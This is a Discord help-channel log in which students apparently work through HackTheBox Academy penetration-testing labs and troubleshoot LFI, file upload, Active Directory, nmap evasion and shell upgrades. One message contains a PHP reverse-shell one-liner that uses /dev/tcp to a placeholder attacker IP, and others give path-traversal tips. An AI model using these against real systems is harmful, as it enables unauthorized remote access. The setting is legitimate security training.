any access-based subscriptions you don't keep the modules unless you 100% completed them

upbeat zinc
#

any doc on how to make msfconsole work with proxychains ? more precisely forward the shell over an intermediate server ? because the server that is exploited can not talk directly to my tooling server

ancient niche
#

okay

#

i have this problem

#

i can't find the wrappers

analog dock
#

Nice screenshot

ancient niche
#

๐Ÿ˜ฆ

#

xD

#

i have virtual box bro xD

storm elk
#

You can still take screenshots from your host you know

ancient niche
#

i don't know ๐Ÿ˜…

dark hedge
#

Win+Shift+S

#

Alt+PrintScreen

#

world is your oyster

thorn elbow
#

Hello ๐Ÿ‘‹

storm elk
tranquil wren
#

Hello, i am doing the Footprinting Easy Lab, I skipped the DNS and logged in with the ||ceil ID over ftp||, i used ||ls -la||. i only see the root user but not really a directory i guess, just '.' and '..' any help would be appreciated

gray yacht
ancient niche
#

okey guys

#

now sorry my cloumsiness

#

clumsiness

#

that is my problem

#

i can't find the wrappers

#

at burpsuite

fathom pendant
#

also best practice to just add at least 4-5 ../

ancient niche
#

i don't understand friend. can you explain me better?

fathom pendant
#

the > raw < instead of > render < or even > pretty <

#

scroll through the render/raw/pretty output

ancient niche
#

mmm

glass quail
#

Module: Active Directory enumeration and attacks
Section: enumeration & retrieving password policies
I am having trouble on finding out the default password length when a new domain is created.

quiet trout
#

XMLLint doesnt seem to be operating "exactly" as output in a demo im walking thru...

Demo Output:

Exciton@htb[/htb]$ curl -s http://10.129.42.190/nibbleblog/content/private/users.xml | xmllint  --format -

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<users>
  <user username="admin">
    <id type="integer">0</id>
    <session_fail_count type="integer">2</session_fail_count>
    <session_date type="integer">1608182184</session_date>
  </user>
  <blacklist type="string" ip="10.10.10.1">
    <date type="integer">1512964659</date>
    <fail_count type="integer">1</fail_count>
  </blacklist>
  <blacklist type="string" ip="10.10.14.2">
    <date type="integer">1608182171</date>
    <fail_count type="integer">5</fail_count>
  </blacklist>
</users>```

My output:

โ””โ”€โ”€โ•ผ [โ˜…]$ curl http://10.129.215.78/data/other/authorization.xml | xmllint --format -
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-100 114 100 114 0 0 6212 0 --:--:-- --:--:-- --:--:-- 6333
<?xml version="1.0" encoding="UTF-8"?>
<item>
<apikey><![CDATA[4f399dc72ff8e619e327800f851e9986]]></apikey>
</item>


Whats up with the wget like download output? Also, other than that is it "working"?
#

any concerns?

#

i was hoping for prettified output

#

its not much diff than curl this might just be a poor example

glass quail
quiet trout
#

ok nvm i tried with a longer file, its working

ancient niche
shut ice
#

Has the AD enum assessment 2 been updated? SAM hashes are different now?

candid night
#

Can't believe I can see the 9 at the front. Seemed almost impossible at the start

rustic sage
#

:D

cyan sonnet
#

Iโ€™m doing the local file inclusion. Can anyone tell me why this isnโ€™t working? It should display the passwd file but itโ€™s just blank now

analog dock
#

Nice screenshot

cyan sonnet
#

Lmao my Mac canโ€™t download discord

compact matrix
cyan sonnet
#

Youโ€™re right thank you

grizzled schooner
#

Working through Shells and Payloads on Antak section, can't find the portion of the website allowing me to upload a file... Any nudges?

kindred sparrow
#

Intro to Academy's Purple Modules - on the zabbix part, I got the shell after running the exploit. I can't seem to find the root.txt file that's supposed to be in /root. Any advice what I might be doing wrong?

midnight verge
#

CPTS : Information Gathering - Web Edition (Web Archives)

#

10th june 2017 ?

#

0 snapshots ?

fathom pendant
midnight verge
#

Okay will look into that, thx for the reply

fathom pendant
#

They are an eu based company. Your only other hint

midnight verge
grizzled schooner
sharp urchin
gloomy raven
#

Hello could someone help me, im new to all this im in the getting started module specifically on the service scanning part and needed help to get the password neede to answer this question of listing the SMB shares available on the target host. Connect to the available share as the bob user. Once connected, access the folder called 'flag' and submit the contents of the flag.txt file

safe star
grizzled schooner
#

Yeah, I'm actively searching the website, but I don't see an upload

#

unless I'm supposed to do it through status.inlanefreight.local and not the IP that you spawn in

safe star
#

thats the point of the vhost

grizzled schooner
#

yeah I put the IP to the vhost, but I get different websites lol

grizzled schooner
#

so in that case, which am I supposed to use? the IP address or status.inlanefreigt

safe star
#

vhost

#

it says vhosts needed right under the ip

grizzled schooner
#

See that's dumb I'm scanning this website trying to brute force directories to find it

#

lol that was simple thanks for the help there

gloomy raven
dark hedge
#

says that you need to authenticate as bob, maybe try doing that

gloomy raven
#

what would the command be to do that?

dark hedge
#

don't remember the flag off the top of my head but you can print the help menu for smbclient

#

or do man smbclient

gloomy raven
#

ok sounds good thank you

safe star
rustic sage
#

Hey guys im in web proxies assessment, question 1
I added a match replace rule to change from disabled> to enabled>, response body, when I test the rule in proxy settings on burp suite it works but when I send the request to repeater and I get the response back its still disabled>

safe star
#

but repeater should be able to bypass that

rustic sage
safe star
gloomy raven
rustic sage
safe star
safe star
gloomy raven
rustic sage
sharp urchin
hexed oyster
#

OK, so I'm working on the skills assessment of the file upload module, I've exfiltrated the source files and figured out how things work as best I can. I've got the upload directory location and how the script names the file. However, the issue that I'm running into is actually finding and executing the file. I keep trying to navigate to the image to execute the code but I keep getting 404 responses. Any thoughts?

safe star
sharp urchin
#

what did u do?

safe star
sharp urchin
safe star
#

did you follow the example?

safe star
#

you should be able to find it with the source

hexed oyster
#

I'll go back and re-read it.

rustic sage
#

Okay this was most definitely the most stupid question I've ever seen on HTB. Holy cow that was such a waste of time I want to sit down with whoever created this box and study his old childhood traumas

#

Such bs, I made a script that did the exact same thing as burp and after 32 attempts it gave me the flag

harsh gorge
#

Lmao nice work

brittle arch
#

Anybody having trouble with the Windows Lateral Movement labs this morning. I can't RDP with provided credentials, I've changed VPN and restarted machines many times.

Just keep getting [11:16:28:048] [4800:4800] [ERROR][com.freerdp.core] - freerdp_abort_connect:freerdp_set_last_error_ex ERRCONNECT_CONNECT_CANCELLED [0x0002000B]

cloud urchin
cloud urchin
brittle arch
cloud urchin
brittle arch
#

The WSUS, and also the skills assesment.. no ping back on any protocol for the provided creds

cloud urchin
gray yacht
ripe bone
#

I am currently studying the blood hound module of AD. When I connect to the target machine from pwnbox as described and run the prepared sharphound.exe, I get an error and cannot get the information. How can I deal with this?

ripe bone
# rustic sage What is the error

I am using the credentials provided in the module and I am able to get a shell with evil-winrm and impacket-wmiexec. However, RDP does not connect. The error is as follows

|ERROR|Unable to connect to LDAP, verify your credentials

drifting trail
#

hey cam someome tell me if we can hack the cubes htb

drifting trail
#

it is for hacking and testing

#

so why not try hacking cube

storm elk
#

Thatโ€™d be illegal

ripe bone
drifting trail
#

im a teen my parents wont allow me to spend money so any suggestion how i can keep going without spending money

#

some modules are expensive like 500 cubes

fathom pendant
#

#giveaways ; participating in CTFs, selling your soul

#

ยฏ_(ใƒ„)_/ยฏ

#

tell your mom that it's better than spending money on VBux

narrow oriole
#

how can i speed this up? ๐Ÿ’€

i did a scan of -sU -sV -vv -Pn -p- --disable-arp-ping

fathom pendant
#

you don't necessarily need to do -sU btw

narrow oriole
#

why sir

fathom pendant
#

you just don't KEK

narrow oriole
#

i alwayys get flitered or close port on port 53

fathom pendant
#

but sometimes it's just a silly thing with it

narrow oriole
#

im trying how to get pass ids/ips

fathom pendant
#

-T4

#

you also don't really need -vv

narrow oriole
#

i did -T 0 on that i forgot to include hahaha

fathom pendant
#

-T 0 is slowest timing

narrow oriole
#

i see

#

what is vv for sir in your own exp? i just found it on google so i tried

fathom pendant
#

it just makes the output more verbose

#

stop being a skid and just trying things and actually read documentation

drifting trail
#

15

#

can i find a guide on OPTinselTrace24-2: Cookie Consumption

storm elk
#

Get parental consent buddy. You need to be 18 or over or have consent

fathom pendant
#

that's the active CTF yeah?

narrow oriole
#

oh wait no i didnt get it on google, ippsec always do use it i just copied his scan ahahaha

narrow oriole
fathom pendant
#

the man pages are gonna be your friend for any command

#

man <command> or <command> --help

drifting trail
fathom pendant
drifting trail
#

there is no age limit

narrow oriole
storm elk
#

On the website it is 18+

narrow oriole
#

but im not blindly copying do i always ask gpt whatever i use

fathom pendant
proven loom
#

๐Ÿคฆโ€โ™‚๏ธ

fathom pendant
#

i barely trust GPT to give me accurate results

proven loom
fathom pendant
#

it's an OK tool for basic stuff, but it shouldn't replace classic research and reading

narrow oriole
#

does this look good

fathom pendant
#

i will always tell you: Try before asking

drifting trail
proven loom
fathom pendant
narrow oriole
fathom pendant
#

literally one of the things you agree to when you sign up to htb

#

@drifting trail this is the important bit

  1. Access and Use of the Services.
    You must be at least 18 years old, and you must register under your real name and valid email.
    2.1. Eligibility Requirements. To access and use our Services, you are required to meet the following eligibility
    criteria:
    (a) You must be at least 18 years of age.
    (b) You need to have read, understood, and agreed to this User Agreement and our Privacy Notice.
    (c) You must register for an account using your actual name and a valid email address.
    (d) You should not be subject to any restrictions that prevent you from using the Services. This includes,
    but is not limited to not being:
    a. Legally or regulatorily barred from using the Services in your jurisdiction.
    b. A resident or citizen of any jurisdiction under sanctions imposed by the UN, US, UK, or EU.
    c. Personally subject to sanctions by the UN, US, UK, or EU.
    2.1.2. Underage Users. If you're under 18, a parent or guardian over 18 must accept this User Agreement on
    your behalf, thereby assuming responsibility for your compliance with these terms.
drifting trail
#

okay if i get my parents consent is that okay ...?

fathom pendant
#

there's a whole form; reach out to support

compact patrolBOT
fathom pendant
storm elk
drifting trail
#

we require that individuals under 18 years of age obtain parental or legal guardian consent before registering for an account and using our services. so i can get my parents consent

storm elk
#

Yea, and fill the form and send it to support

fathom pendant
#

^

#

it's for legal protections reasons

drifting trail
#

no bigge in a min

fathom pendant
#

stating that your parent/guardians understand that HTB is not liable if you do some dumb skid shit and try and hack the government ||and get a visit/call from a 3-letter agency||

drifting trail
#

i know i have read that stuff ages ago

drifting trail
#

can i find a guide or something which help me to complete OPTinselTrace24-2: Cookie Consumption

fathom pendant
#

No

#

this wouldn't be the right channel anyway

#

it's an active sherlock, so sharing writeups is explicitly against ToS

narrow oriole
#

what does this mean

fathom pendant
#

add --max-retries=3

#

also i suggest resetting the lab between attempts in the event that it's blocking you

#

if you trip the alerts it does temp block you

narrow oriole
lost scroll
#

Hello guys,
I'm completely stuck on Rapid Triage Examination & Analysis Tools from Introduction to Digital Forensics.
I've tried some things with Timeline Explorer then in MFTExplorer but I can't get then answer...
I can't even find uninstall.exe but I know i need its zone.identifier...

coral trench
#

hey if any could help , im in module injection attacks skill assessment , i reached to the internal app and its parameter but i can't craft the payload that gets all records especially since pdf is so small

analog folio
#

May I please get help with the "ATTACKING AUTHENTICATION MECHANISMS" -> "Signature Wrapping Attack" lab? It seems that whether I do the attack manually or try all 8 XSW methods in the Burp Suite SAML Raider extension, I get the error "Invalid SAML Response. Not Authenticated". I've also checked to ensure the XML isn't broken.

storm elk
#

I got stuck there due to the code being beautified

restive vortex
#

I'd seriously appreciate some help on the medium lab in Network enumeration with nmap - IDS/IPS evasion techniques. I've tried using multiple flags such as -sS, -Pn and built in nmap scripts but its either returning as filtered or erroring out.

#

It's one of the beginnner modules so if anyone can lend a hand id be ecstatic

analog folio
storm elk
#

yeah, all other sections worked with beautifier

#

that one, did not

analog folio
#

Thank you

storm elk
#

hope it solves the issue for you

#

what are you on about @cloud ginkgo

analog folio
hasty mauve
#

I'm getting this when attempting Windows PrivEsc -> User Account Control lab.

#

If I run it twice first time it works second time it displays this, third time works XD

#

but I do not get a connection back in any of these

#

I'm using a windows-based attack host (Commando VM)
windows firewall on my device is disabled.
and this is the newest Metasploit version.
I tried pinging me from the target and it worked.

#

so idk why I'm not getting a connection back

hasty mauve
#

This DLL just won't work....

opal nexus
# hasty mauve This DLL just won't work....

I guess you configured the 'sttstr.dll' to invoke reverse shell.

Maybe it is something with your connection? try configure the dll to add an administrator user.

Or alternatively, what command did you use to invoke the dll?

wind void
#

Hello is there anyone that can help me with my iPhone I have an iOS 18.2 installed and I installed it yesterday, I was initially on iOS 17.5.2 and decided to go on 18.
I downloaded an app called Scarlet and enable it to be trusted on my iOS 17 and after upgrading to iOS 18 it was still working, the following day I tried to open it and it said the app could not be verified of itโ€™s integrity. Could anyone tell me whatโ€™s going on?

fathom pendant
wind void
#

Oh men

#

๐Ÿฅฒ

fathom pendant
#

It doesn't. Sounds like the app needs to be updated but it's not related to htb academy or any of the learning modules, so it's not for this channel

#

Reading channel descriptions, #welcome, and #rules when you go in a server is important

gilded rune
#

I can't send images here?

acoustic owl
gilded rune
queen ore
#

I'm stuck on Information gathering DNS zone transfer. I'm not sure where I'm going wrong, following the example in the lesson. Anyone here know what I'm doing wrong?

acoustic owl
queen ore
#

Tried in both my own machine and the pwnbox

acoustic owl
queen ore
#

Roger thanks

gilded rune
acoustic owl
mystic wadi
#

Has anyone been able to answer this question? Looks like its been an issue for a while, I'm having the same problem.

#

Intro to Binary Fuzzing > Glee with Klee Question #2, running it I only receive one error (null page access) that the module won't accept as the answer.

gilded rune
#

It's showing "done reading, checkout modules"

acoustic owl
#

This one?
/identify (ACCOUNT_IDENTIFIER)

gilded rune
queen ore
#

Got it, I had to add the IP to the /etc/hosts file

gilded rune
#

Pls I really need help with this, I've tried searching for exploitable open services, I got the openssh 9.2p1(regreSSHion) but I just can find am exploit for it.
I've tried checking with searchsploit and metasploit but still no result ๐Ÿ˜•

acoustic owl
# queen ore Got it, I had to add the IP to the /etc/hosts file

Read the topics for DNS again.
If you specify a domain as a name server, it must first be resolved.
Sure, you can put the domain in the /etc/hosts file. But your PC still has to resolve the domain every time.
Therefore, whenever possible, use the IP address of the name server and not the domain
Instead of dig @one.one.one.one example.com you should use dig @1.1.1.1 example.com

digital sigil
gilded rune
queen ore
acoustic owl
#

So first it has to resolve the name of the name server in order to then query it.

livid pelican
#

can anyone help i cant able to talk in general

acoustic owl
tender nimbus
#

Hey guys i'm doin the python3 modul and i'm stuck with this error can someone help me?

tender nimbus
#

also tried to run in vrtl env but don't work same error

soft reef
#

Is there an order to follow in the paths like senior web and cape?

acoustic owl
#

I recommend working through the modules in the order of the path.

digital sigil
#

There are some introductory modules, but it's unclear what the order is for them, e.g. learning process, setting up etc.
Is there a recommended order to those?

acoustic owl
digital sigil
#

Ahhh, right thanks

solid acorn
#

Hi everyone, I'm new here, I have to connect by ssh I'm in the module linux fundamentals, everything is setup, but it doesn't accept the password, can someone help?

#

I've already download and connect their openvpn tcp 443

compact apex
#

Hey, doing the Skill A 1 of AD from cpts, any clue where i can find the exe of Rubeus and import it into the victim machine (MS01) or compile it directly there ?

tender nimbus
compact apex
tender nimbus
#

`import requests
import re
from bs4 import BeautifulSoup

PAGE_URL = 'http://target:port'

def get_html_of(url):
resp = requests.get(url)

if resp.status_code != 200:
    print(f'HTTP status code of {resp.status_code} returned, but 200 was expected. Exiting...')
    exit(1)

return resp.content.decode()

html = get_html_of(PAGE_URL)
soup = BeautifulSoup(html, 'html.parser')
raw_text = soup.get_text()
all_words = re.findall(r'\w+', raw_text)

word_count = {}

for word in all_words:
if word not in word_count:
word_count[word] = 1
else:
current_count = word_count.get(word)
word_count[word] = current_count + 1

top_words = sorted(word_count.items(), key=lambda item: item[1], reverse=True)

for i in range(10):
print(top_words[i][0])`

#

sorry for the long cp guys

tender nimbus
lost storm
#

Any nudge on this (1747) Crackmapexec skills Assessment Question 3?

In same predicament have SQL01 rooted and for the hint in DEV01 suggests credential reuse + some sort of bypass. None of the creds I have are working on DEV01

compact apex
#

why not trying another tool such as Kerbrute ?

ripe vigil
#

I am also facin the same issue. Did youhappen to solve this successfully?

sly kelp
#

That was the silly mistake

quiet trout
#

quick question all, i have a reverse shell up for an initial foothold ... i wanna run linpeas then get back the output... can i send it to the same nc listener or do i need a separate one just for the file transfer?

#

ie: does it handle multiple connections?

#

tryign to figure out the best workflow for how to reduce complication on my end wondering if this might be a strat

quiet wolf
quiet trout
#

So are you using a turnkey something or other you've setup with php and stuff that allows CRUD?

#

post/put for the file to the server?

quiet wolf
quiet trout
#

its tooling, should be fine (as i understand the rules)

tender nimbus
quiet trout
#

Uhm, if you wouldnt mind humoring me another question perhaps a lil silly, when you connect to a reverse shell like this:

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/PWNIP/PWNPO 0>&1'"); ?>

is this considered a "full tty"

ie: no need to run a python3 -c "import pty;pty.spawn(...)"

#

the php reverse shell im connected to, i cannot press up for past cmd, i cannot press left arrow to go left etc

#

earlier in the module it suggested that upgrading to full tty resolves this issue (but even when i did, i still couldnt use the arrows and other stuffs)

quiet wolf
#

I am not 100% sure. What i can recommend and a tool that i use is Sliver c2
If you look into it and learn it, It will help you a bounch.

storm elk
#

No

#

No

#

This is not hacker for hire

quiet wolf
#

I belive you shouldn't ask this question here.

naive cedar
#

hi, i'm stuck with web attacks module skill assesment, please help me

quiet trout
#

oh shit its fucking cubes talks

#

holy fuck i was waiting all week for this and missed it

quiet wolf
quiet trout
#

oh god its WAY over

quiet wolf
naive cedar
# quiet wolf What have tools have you run?

I do fuzzing and find out APIs like api.php reset.php. and I read some hints from the hackthebox forum, but everyone mentioned api.php/user/<uid>. How can I know exactly /user/<uid>???

tender nimbus
quiet wolf
tender nimbus
#

ow qwerty was activated

tender nimbus
naive cedar
#

no no, i mean "/user"

tender nimbus
#

uid is a user unique identifier (number)

naive cedar
#

how to found "/user"?

tender nimbus
#

also by fuzzing

#

with a wordlist

#

like ffuf -w wordlist.txt:FUZZ -u http://ip:port/FUZZ

naive cedar
#

hmm, thanks, i will try again

tender nimbus
#

do you know how to work with ffuf first? @naive cedar

naive cedar
#

yes, i do

tender nimbus
#

normaly its not that hard but tbh its searching somethimes the awnser is in front of you eyes^^

naive cedar
#

i cann't found way fuzz to get exactly the url api.php/user/<uid>...

tender nimbus
#

if you sure its user, make a list with 10 words in it with user to and test this wordlist, if it don't give you any results then you maybe doing something wrong

naive cedar
#

that's the question i'm wondering about...

tender nimbus
#

i'm not sure but i think that when using recursion you have to specify the recursion-depth to

#

bcs its 0 in default

modern umbra
#

Intro to C2 Operations with Sliver > Constrained Delegation: After obtaining a TGT for the carrot user for eventsystem service, how do we use it to successfully execute ls //srv02.child.htb.local/c$ ?

tender nimbus
naive cedar
#

huh, i think default is infiniti?

naive cedar
#

can me dms you ?

tender nimbus
#

yes you cqn norq;ly

#

shift windows + s

storm elk
naive cedar
#

i do not have permission to post photos on this server

storm elk
#

Then you can post as many photos as you like

naive cedar
#

i don't have any information to find out the url api.php/user/<uid>. the only thing i can get the module done is to accept /user, but i feel very frustrated when i can't find a way to find it

tender nimbus
#

remove you fitler -fs 0

#

what do you get when you go to api.index in you bro<ser?

naive cedar
#

whether /user or a certain router is invalid. body size is always 0, so how to distinguish and accurately indicate /user?

naive cedar
#

body size always 0

tender nimbus
#

did you add evertything to /etc/hosts file? if needed?

#

i haven't made that module so i'm trying to search with you

naive cedar
#

i think that is not necessary for this module

tender nimbus
#

so when you go to http://ip:port/api.php you have nothing?

tender nimbus
tender nimbus
#

the only thing i can say is if they found /user/ part its probably with ffuf

#

try to look back in the sections you probably missing something

naive cedar
#

api.php

#

and api.php/user

#

they same

tender nimbus
#

so you question is how do they found /api.php/user?

naive cedar
#

yessss

#

that's is

#

sd

tender nimbus
#

okej which module again?

#

im gonna take a look

naive cedar
#

web attacks skill assesment

#

my English is not really good, sorry for the inconvenience

tender nimbus
#

but try to find it you own way

naive cedar
#

but my cookie

#

not same the hint

tender nimbus
#

can't help you further haven't saw those things yet sorry ^^

naive cedar
#

okay, thank you :3

tender nimbus
storm elk
#
source bin/activate
pip3 install beautifulsoup4 ```
quiet trout
# storm elk Have you tried using a venv?

+1 that doesnt look like a pwnbox, most distros and for a fact kali installs a "system managed" python install, which as it was explained to me, the system uses for its own purposes you dont want to comingle it with other peripheral packages even if they are pentesting related (and even still, again as explained to me, using pipx is not an ideal solution) venv is the most practical approach as i understand it

#

this is not my advice this was advice given to me by python devs

naive cedar
#

well i found out there is login information here, it took me 2 days just to look at such a small thing again....

quiet trout
#

hey bro i been there its part of the process

storm elk
#

pip3 is awesome

quiet trout
#

in fact im still there, most days

#

(i think thats part of the process too)

#

It sucks thats part of the fun, right?

naive cedar
#

maybe..

#

not funsadglas

quiet trout
#

"FUN"

digital sigil
naive cedar
quiet trout
#

dude wtf, how do people get linpeas output to file? im getting a bunch of "error broken pipe" thrown from cat...

is this normal for ./linpeas.sh -a > linOut.txt

#

should i be tee-ing it instead?

#

theres so much output wiht linpeas ill never be able to run both cmds then compare

naive cedar
#

how about replace by >>?

quiet trout
#

ill try that but i think its gonna do the same as > (>> just over writes instead of append)

#

(file is new)

naive cedar
#

i have completed the module, thank you very much <333

#

2 a.m in Vietnam, sleep right now

#

sadglas .

fathom pendant
quiet trout
#

thx yes thats what im eant

fathom pendant
quiet trout
#

lineum seems more palatable

#

im trying to get familiar with how to digest this stuff tho, for the modules sake

fathom pendant
#

Meh it just throws a lot of random shit at you

quiet trout
#

even ippsec has stated in a video or two that the output is just so extensive and unorganized that it makes it like unmanageable

#

@fathom pendant hope your friday is going awesome btw. if you'll humor me a question, if my reverse shell php file is the standard

<?php system("/bin/bash ...");?>

and when i get to the shell from my nc listener if i cant scroll with the arrow keys access previous cmds with up arrow i dont have a "full tty" would that be safe to say?

fathom pendant
#

Yep

#

It's not a full shell

#

You can use python and the standard tricks to upgrade

#

There's also a neat tool called pwncat

quiet trout
#

is it redundant to run:

<?php system("/bin/bash ...");?>

followed by

python3 -c 'pty; pty.spawn("/bin/bash")'

or would you skip the python cmd at that point and do the ctrl+z stuff stty raw; cols=...,etc.?

fathom pendant
#

It's not redundant

quiet trout
fathom pendant
#

There's more to it

quiet trout
#

noted, thank you

hexed ferry
#

Can anyone help with the Web Attaks skills assessment? I'm doing everything right so far but I keep getting "Missing Parameters"... in my response. Any tips would be greatly appreciated

agile star
#

@everyone

digital sigil
acoustic owl
acoustic owl
opal nexus
severe inlet
#

I'm currently on the Getting Started Module
in the section Public Exploits

the hint says to look for plugin exploits

i'm really stuck here
is it required to use burp suite here? since i tried and couldn't make it work

or is it easier? like msf?

compact matrix
opal nexus
severe inlet
severe inlet
#

i feel so stupid after completing the question
ive always heard from people that HTB is really hard and you need to search outside the module so i was going through SQL injection and burp suite

The answer is way easier lol

analog dock
rustic sage
gaunt temple
#

Supp guys? Can I dm someone about the Skills Assessment of "MSSQL, Exchange, and SCCM Attacks "

teal cape
#

Hi im stuck currently Active Directory Enumeration & Attacks Module in the AD Enumeration & Attacks - Skills Assessment Part I section on question 4. I am unable to connect to MS01 I made sure my meterpreter session, socksproxy, and autoroute is set up properly. However even after using proxychains with nmap or cme it cannot connect to it

fathom pendant
#

Is the ip in your hosts file?

#

Without it in your hosts file you need the IP

teal cape
#

let me go edit that in dont believe I did that

#

i added the IP into the /etc/hosts file and domain however no luck still

stone gorge
#

Working on the CME module...
Trying to get Empire running, but consistently comes up with ModuleNotFoundError: No module named 'jq' .... anybody else getting this in the latest Parrot OS? Have any work-around ideas. I know that jq is installed because I use it all the time.

#

I did all the normal things to make sure jq is installed including ... pip install .... --break-system-packages

#

Same error on Kali also.

stone gorge
iron oar
#

anyone have a solution when the module is stuck on deploying?

quasi wave
#

Hi for the protected files section of password attacks, how do I get Kira's cracked password? the only question in the section says Kira's password is already cracked so now I just need to get ssh key. but I can't find Kira's password

#

where is Kira's password?

fathom pendant
iron oar
fathom pendant
iron oar
#

when its happened before its resolved itself in a few hours

#

which is def before monday so its fine

quasi wave